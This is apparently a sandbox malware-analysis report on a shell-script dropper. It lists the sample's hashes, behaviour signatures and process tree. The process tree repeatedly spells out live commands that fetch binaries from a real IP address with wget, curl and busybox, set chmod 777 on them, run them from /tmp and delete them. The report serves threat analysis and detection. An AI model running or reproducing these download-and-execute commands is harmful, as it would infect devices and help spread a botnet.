Analysis
-
max time kernel
67s -
max time network
95s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 02:42
Static task
static1
Behavioral task
behavioral1
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
-
Size
10KB
-
MD5
91ccaeb90f7a1a486a1a1cc72526a2c5
-
SHA1
f4eae2ed37483fd578a41a4edaa29af24ebe85be
-
SHA256
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3
-
SHA512
beb4e0fafb2bc99022e6595d1f0d0e57cd49ae6da6196c900d45f9b3405d9b6a256070fdaf21fff922ed583c8021f0625d81a56fe82e4c7c28ecf1a5578e2d21
-
SSDEEP
192:mploN9In4UdM0DP0B51+JJRzBKOKBiyaploN9s4UdM0XOKBiyX51+JJv7:mploN9In4UdM0DP0EzBBploN9s4UdM0+
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 868 chmod 946 chmod 958 chmod 753 chmod 898 chmod 916 chmod 928 chmod 982 chmod 789 chmod 904 chmod 910 chmod 857 chmod 952 chmod 964 chmod 814 chmod 892 chmod 767 chmod 886 chmod 934 chmod 940 chmod 976 chmod 747 chmod 880 chmod 922 chmod 970 chmod 740 chmod 874 chmod 829 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL 741 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK 748 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB 754 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I 768 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O 790 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ 815 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S 830 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv 859 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp 869 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 875 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 881 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw 887 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn 893 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A 899 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL 905 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK 911 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB 917 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I 923 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O 929 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ 935 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S 941 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A 947 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv 953 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp 959 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 965 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 971 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw 977 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn 983 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ curl File opened for modification /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 curl File opened for modification /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK curl File opened for modification /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A curl File opened for modification /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 curl File opened for modification /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn curl File opened for modification /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O curl File opened for modification /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw curl File opened for modification /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I curl File opened for modification /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O curl File opened for modification /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp curl File opened for modification /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK curl File opened for modification /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL curl File opened for modification /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp curl File opened for modification /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn curl File opened for modification /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ curl File opened for modification /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL curl File opened for modification /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S curl File opened for modification /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv curl File opened for modification /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv curl File opened for modification /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw curl File opened for modification /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB curl File opened for modification /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 curl File opened for modification /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A curl File opened for modification /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S curl File opened for modification /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 curl File opened for modification /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I curl File opened for modification /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB curl
Processes
-
/tmp/c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh/tmp/c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh1⤵PID:709
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:715
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:727
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:738
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:746
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:752
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:755
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:764
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:772
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:773
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:786
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:793
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:810
-
-
/bin/chmodchmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:818
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:825
-
-
/bin/chmodchmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:853
-
-
/bin/chmodchmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:862
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:867
-
-
/bin/chmodchmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:873
-
-
/bin/chmodchmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:879
-
-
/bin/chmodchmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:885
-
-
/bin/chmodchmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:891
-
-
/bin/chmodchmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:897
-
-
/bin/chmodchmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:903
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:909
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:915
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:921
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:927
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:933
-
-
/bin/chmodchmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:939
-
-
/bin/chmodchmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- File and Directory Permissions Modification
PID:940
-
-
